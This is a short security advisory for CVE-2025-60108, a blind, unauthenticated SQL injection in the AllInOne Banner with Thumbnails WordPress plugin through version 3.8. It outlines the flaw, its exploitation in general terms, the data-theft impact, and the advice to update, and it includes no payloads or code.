CVE-2025-60108

Analysis

The LambertGroup - AllInOne - Banner with Thumbnails WordPress plugin, up to and including version 3.8, suffers from an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. This blind SQL injection flaw allows an attacker to inject arbitrary SQL queries without requiring authentication, as the vulnerable input is not properly sanitized before being used in database queries [1].

Exploitation

The attack surface is the plugin's core functionality, which handles thumbnails and banner display. An unauthenticated attacker can exploit this by sending crafted HTTP requests containing malicious SQL payloads to the affected plugin endpoints. The blind nature of the injection means the attacker may not see direct output but can infer database contents through boolean-based or time-based techniques [1].

Impact

Successful exploitation enables an attacker to interact directly with the WordPress database. This can lead to extraction of sensitive data, such as user credentials, posts, and configuration details. The vulnerability is noted as being used in mass-exploit campaigns, targeting thousands of websites regardless of traffic size or popularity [1].

Mitigation

As of the advisory date, users are urged to immediately update the plugin to a patched version. If updating is not possible, site administrators should contact their hosting provider or web developer for assistance. The vulnerability is assigned a CVSS v3 score of 8.5 (High), reflecting the serious risk of data theft and unauthorized database access [1].